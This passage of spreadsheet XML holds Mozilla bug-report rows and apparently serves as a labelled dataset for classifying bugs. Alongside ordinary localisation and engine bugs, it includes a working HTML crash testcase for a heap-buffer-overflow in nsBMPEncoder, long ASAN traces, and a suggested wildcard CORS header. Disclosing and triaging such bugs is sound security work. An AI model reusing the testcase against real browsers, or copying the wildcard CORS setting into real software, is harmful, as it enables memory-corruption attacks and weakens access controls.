          <t>See the URL for bugtraq posting.
"Currently we are not aware of any vendor-supplied patches for this issue. If
you feel we are in error or are aware of more recent information, please mail us
at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;."
not setting security flag because this is already publicly disclosed.</t>
        </is>
      </c>
      <c r="X1668" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1669">
      <c r="A1669" t="n">
        <v>882876</v>
      </c>
      <c r="B1669" t="inlineStr">
        <is>
          <t>2013-06-13 13:09:53 -0700</t>
        </is>
      </c>
      <c r="C1669" t="inlineStr">
        <is>
          <t>If the region is Durango and language is set to polish some words will still appear in english</t>
        </is>
      </c>
      <c r="D1669" t="inlineStr">
        <is>
          <t>2013-07-15 09:45:40 -0700</t>
        </is>
      </c>
      <c r="E1669" t="n">
        <v>1</v>
      </c>
      <c r="F1669" t="n">
        <v>1</v>
      </c>
      <c r="G1669" t="n">
        <v>6</v>
      </c>
      <c r="H1669" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1669" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1669" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K1669" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L1669" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1669" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1669" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1669" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1669" t="inlineStr"/>
      <c r="Q1669" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1669" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1669" t="inlineStr">
        <is>
          <t>2013-07-11</t>
        </is>
      </c>
      <c r="T1669" t="n">
        <v>1</v>
      </c>
      <c r="U1669" t="n">
        <v>0</v>
      </c>
      <c r="V1669" t="n">
        <v>18</v>
      </c>
      <c r="W1669" t="inlineStr">
        <is>
          <t>Created attachment 762267
Purchase flow, some words appear in English
Steps to reproduce:
1. Change the region to Durango and language is set to Polish
2. Search for a paid app and select buy. 
3. Notice that some words appear in English during the purchase flow. 
Expected behaviour
All language should be displayed in Polish.
Observed behaviour
Some words appear in English</t>
        </is>
      </c>
      <c r="X1669" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1670">
      <c r="A1670" t="n">
        <v>830943</v>
      </c>
      <c r="B1670" t="inlineStr">
        <is>
          <t>2013-01-15 12:51:46 -0800</t>
        </is>
      </c>
      <c r="C1670" t="inlineStr">
        <is>
          <t>Incorrect behavior on emscripten "bullet" test</t>
        </is>
      </c>
      <c r="D1670" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:15 -0800</t>
        </is>
      </c>
      <c r="E1670" t="n">
        <v>1</v>
      </c>
      <c r="F1670" t="n">
        <v>1</v>
      </c>
      <c r="G1670" t="n">
        <v>3</v>
      </c>
      <c r="H1670" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1670" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1670" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1670" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1670" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1670" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1670" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1670" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1670" t="inlineStr">
        <is>
          <t>[adv-main19+]</t>
        </is>
      </c>
      <c r="Q1670" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1670" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1670" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1670" t="n">
        <v>1</v>
      </c>
      <c r="U1670" t="n">
        <v>0</v>
      </c>
      <c r="V1670" t="n">
        <v>20</v>
      </c>
      <c r="W1670" t="inlineStr">
        <is>
          <t>Created attachment 702476
bullet testcase
Another failure on the emscripten test suite on x86_64. Works with --no-ion or in v8, fails with ion.</t>
        </is>
      </c>
      <c r="X1670" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1671">
      <c r="A1671" t="n">
        <v>986057</v>
      </c>
      <c r="B1671" t="inlineStr">
        <is>
          <t>2014-03-20 10:37:46 -0700</t>
        </is>
      </c>
      <c r="C1671" t="inlineStr">
        <is>
          <t>Loop Server — Should accept cross origin requests</t>
        </is>
      </c>
      <c r="D1671" t="inlineStr">
        <is>
          <t>2014-07-21 15:02:48 -0700</t>
        </is>
      </c>
      <c r="E1671" t="n">
        <v>1</v>
      </c>
      <c r="F1671" t="n">
        <v>1</v>
      </c>
      <c r="G1671" t="n">
        <v>6</v>
      </c>
      <c r="H1671" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1671" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J1671" t="inlineStr">
        <is>
          <t>Server</t>
        </is>
      </c>
      <c r="K1671" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1671" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1671" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1671" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1671" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1671" t="inlineStr">
        <is>
          <t>[s=mlpnightly1, p=.25][qa!]</t>
        </is>
      </c>
      <c r="Q1671" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1671" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1671" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1671" t="n">
        <v>1</v>
      </c>
      <c r="U1671" t="n">
        <v>0</v>
      </c>
      <c r="V1671" t="n">
        <v>17</v>
      </c>
      <c r="W1671" t="inlineStr">
        <is>
          <t>We should allow cross origin resource sharing for some URLs, that will be called from the WebApp.
To do that, add the following headers:
res.set("Access-Control-Allow-Origin", "*");
res.set("Access-Control-Allow-Methods", "GET,POST");</t>
        </is>
      </c>
      <c r="X1671" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1672">
      <c r="A1672" t="n">
        <v>1337504</v>
      </c>
      <c r="B1672" t="inlineStr">
        <is>
          <t>2017-02-07 12:48:06 -0800</t>
        </is>
      </c>
      <c r="C1672" t="inlineStr">
        <is>
          <t>SEGV in ClearBidiControls</t>
        </is>
      </c>
      <c r="D1672" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:03 -0700</t>
        </is>
      </c>
      <c r="E1672" t="n">
        <v>1</v>
      </c>
      <c r="F1672" t="n">
        <v>1</v>
      </c>
      <c r="G1672" t="n">
        <v>3</v>
      </c>
      <c r="H1672" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1672" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1672" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1672" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1672" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1672" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1672" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1672" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1672" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+] fixed by bug 410857</t>
        </is>
      </c>
      <c r="Q1672" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1672" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1672" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T1672" t="n">
        <v>1</v>
      </c>
      <c r="U1672" t="n">
        <v>0</v>
      </c>
      <c r="V1672" t="n">
        <v>13</v>
      </c>
      <c r="W1672" t="inlineStr">
        <is>
          <t>Created attachment 8834588
firefox-SEGV-ClearBidiControls.html
Tested on:
OS: Ubuntu 16.04
Firefox: ASAN build sourcestamp: 6d27535f4fe912068e0a0ac5854f7f39e94964a5
ASAN-trace:
ASAN:DEADLYSIGNAL
=================================================================
==15061==ERROR: AddressSanitizer: SEGV on unknown address 0x7fff31db57ac (pc 0x7f6b5302adfa bp 0x7ffd31db56d0 sp 0x7ffd31db5320 T0)
    #0 0x7f6b5302adf9 in ClearBidiControls /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:313:21
    #1 0x7f6b5302adf9 in ResolveParagraphWithinBlock /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:1226
    #2 0x7f6b5302adf9 in nsBidiPresUtils::TraverseFrames(nsBlockFrame*, nsBlockInFlowLineIterator*, nsIFrame*, BidiParagraphData*) /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:1192
    #3 0x7f6b530295e6 in nsBidiPresUtils::Resolve(nsBlockFrame*) /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:697:5
    #4 0x7f6b531e02b9 in ResolveBidi /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:7458:10
    #5 0x7f6b531e02b9 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1176
    #6 0x7f6b532438d0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #7 0x7f6b53247f0e in nsColumnSetFrame::ReflowChildren(mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) /home/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:648:7
    #8 0x7f6b5324c896 in ReflowColumns /home/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:354:19
    #9 0x7f6b5324c896 in nsColumnSetFrame::FindBestBalanceBSize(mozilla::ReflowInput const&amp;, nsPresContext*, nsColumnSetFrame::ReflowConfig&amp;, nsColumnSetFrame::ColumnBalanceData&amp;, mozilla::ReflowOutput&amp;, nsCollapsingMargin&amp;, bool&amp;, bool&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:984
    #10 0x7f6b5324d9dd in nsColumnSetFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:1093:5
    #11 0x7f6b5320082d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, mozilla::ReflowInput&amp;, unsigned int&amp;, mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
    #12 0x7f6b531f6158 in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3466:7
    #13 0x7f6b531e9c26 in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2835:5
    #14 0x7f6b531e9c26 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2374
    #15 0x7f6b531e0654 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #16 0x7f6b5320082d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, mozilla::ReflowInput&amp;, unsigned int&amp;, mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
.
.
.</t>
        </is>
      </c>
      <c r="X1672" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1673">
      <c r="A1673" t="n">
        <v>1294677</v>
      </c>
      <c r="B1673" t="inlineStr">
        <is>
          <t>2016-08-12 05:55:45 -0700</t>
        </is>
      </c>
      <c r="C1673" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in nsBMPEncoder::AddImageFrame</t>
        </is>
      </c>
      <c r="D1673" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:24 -0700</t>
        </is>
      </c>
      <c r="E1673" t="n">
        <v>1</v>
      </c>
      <c r="F1673" t="n">
        <v>1</v>
      </c>
      <c r="G1673" t="n">
        <v>3</v>
      </c>
      <c r="H1673" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1673" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1673" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K1673" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1673" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1673" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1673" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1673" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1673" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q1673" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1673" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1673" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T1673" t="n">
        <v>1</v>
      </c>
      <c r="U1673" t="n">
        <v>0</v>
      </c>
      <c r="V1673" t="n">
        <v>15</v>
      </c>
      <c r="W1673" t="inlineStr">
        <is>
          <t>Created attachment 8780507
crash.html (testcase, crashes firefox)
A integer overflow vulnerability exists in nsBMPEncoder::AddImageFrame:
BMPEncoder.cpp:
191:  auto row = MakeUniqueFallible&lt;uint8_t[]&gt;(mBMPInfoHeader.width *
192: 				     BytesPerPixel(mBMPInfoHeader.bpp));
The testcase crashes the latest 64-bit ASAN build of Firefox as follows:
crash.html:
&lt;script&gt;
        c=document.createElement('canvas');
        c.setAttribute('width',(0x100000000/4) + 4);
        c.toBlob(alert, "image/bmp", "-moz-parse-options:format=bmp;bpp=32");
&lt;/script&gt;
ASAN output:
=================================================================
==28279==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200021ef60 at pc 0x7effab381be8 bp 0x7eff8f6fdd90 sp 0x7eff8f6fdd88
WRITE of size 1 at 0x60200021ef60 thread T34 (Encodin~able #1)
    #0 0x7effab381be7 in ConvertHostARGBRow /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/bmp/nsBMPEncoder.cpp:435:19
    #1 0x7effab381be7 in nsBMPEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/bmp/nsBMPEncoder.cpp:202
    #2 0x7effab380489 in nsBMPEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/bmp/nsBMPEncoder.cpp:78:8
    #3 0x7effab6306bd in mozilla::dom::ImageEncoder::ExtractDataInternal(nsAString_internal const&amp;, nsAString_internal const&amp;, unsigned char*, int, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::layers::Image*, nsICanvasRenderingContextInternal*, mozilla::layers::AsyncCanvasRenderer*, nsIInputStream**, imgIEncoder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:455:10
    #4 0x7effab69a20b in mozilla::dom::EncodingRunnable::ProcessImageData(unsigned long*, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:169:19
    #5 0x7effab692fd2 in mozilla::dom::EncodingRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:211:19
    #6 0x7effa8aa350f in nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:227:7
    #7 0x7effa8aa3bfc in non-virtual thunk to nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:154:15
    #8 0x7effa8a9c6b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #9 0x7effa8b1aa9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #10 0x7effa986fa7f in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:384:5
    #11 0x7effa97e31f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #12 0x7effa97e31f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #13 0x7effa97e31f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #14 0x7effa8a979d1 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:463:5
    #15 0x7effc1960378 in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #16 0x7effc4f566f9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76f9)
    #17 0x7effc3fdfb5c in clone /build/glibc-GKVZIf/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109
0x60200021ef60 is located 0 bytes to the right of 16-byte region [0x60200021ef50,0x60200021ef60)
allocated by thread T34 (Encodin~able #1) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7effab381168 in operator new[] /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:267:12
    #2 0x7effab381168 in MakeUniqueFallible&lt;unsigned char []&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/UniquePtrExtensions.h:33
    #3 0x7effab381168 in nsBMPEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/bmp/nsBMPEncoder.cpp:191
    #4 0x7effab380489 in nsBMPEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/bmp/nsBMPEncoder.cpp:78:8
    #5 0x7effab6306bd in mozilla::dom::ImageEncoder::ExtractDataInternal(nsAString_internal const&amp;, nsAString_internal const&amp;, unsigned char*, int, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::layers::Image*, nsICanvasRenderingContextInternal*, mozilla::layers::AsyncCanvasRenderer*, nsIInputStream**, imgIEncoder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:455:10
    #6 0x7effab69a20b in mozilla::dom::EncodingRunnable::ProcessImageData(unsigned long*, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:169:19
    #7 0x7effab692fd2 in mozilla::dom::EncodingRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:211:19
    #8 0x7effa8aa350f in nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:227:7
    #9 0x7effa8aa3bfc in non-virtual thunk to nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:154:15
    #10 0x7effa8a9c6b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #11 0x7effa8b1aa9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #12 0x7effa986fa7f in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:384:5
    #13 0x7effa97e31f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #14 0x7effa97e31f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #15 0x7effa97e31f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #16 0x7effa8a979d1 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:463:5
    #17 0x7effc1960378 in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #18 0x7effc4f566f9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76f9)
Thread T34 (Encodin~able #1) created by T0 (Web Content) here:
    #0 0x49a839 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7effc195cf3f in _PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7effc195cb4a in PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7effa8a9915b in nsThread::Init() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:634:8
    #4 0x7effa8aa087f in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadManager.cpp:253:17
    #5 0x7effa8aa2309 in nsThreadPool::PutEvent(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:106:3
    #6 0x7effa8aa3edf in nsThreadPool::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:276:5
    #7 0x7effab6329fc in Dispatch /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsIEventTarget.h:37:14
    #8 0x7effab6329fc in mozilla::dom::ImageEncoder::ExtractDataAsync(nsAString_internal&amp;, nsAString_internal const&amp;, bool, mozilla::UniquePtr&lt;unsigned char [], mozilla::DefaultDelete&lt;unsigned char []&gt; &gt;, int, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::dom::EncodeCompleteCallback*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:328
    #9 0x7effad741238 in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::EncodeCompleteCallback*, nsAString_internal const&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:114:9
    #10 0x7effad740b01 in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::FileCallback&amp;, nsAString_internal const&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:71:3
    #11 0x7effadc1cfbe in mozilla::dom::HTMLCanvasElement::ToBlob(JSContext*, mozilla::dom::FileCallback&amp;, nsAString_internal const&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/html/HTMLCanvasElement.cpp:770:3
    #12 0x7effad3c2d2a in mozilla::dom::HTMLCanvasElementBinding::toBlob(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLCanvasElement*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:355:3
    #13 0x7effad641f37 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2770:13
    #14 0x7effb35b9a9b in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:232:15
    #15 0x7effb35b9a9b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:441
    #16 0x7effb35a07b3 in CallFromStack /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:504:12
    #17 0x7effb35a07b3 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2873
    #18 0x7effb3586f8e in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #19 0x7effb35bc370 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:679:15
    #20 0x7effb35bca9e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:711:12
    #21 0x7effb30e9ece in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::StaticScope*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4434:19
    #22 0x7effb30eaa21 in Evaluate /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4461:12
    #23 0x7effb30eaa21 in JS::Evaluate(JSContext*, JS::AutoVectorRooter&lt;JSObject*&gt;&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4522
    #24 0x7effab8e7b4d in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:206:12
    #25 0x7effab8e863f in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:266:10
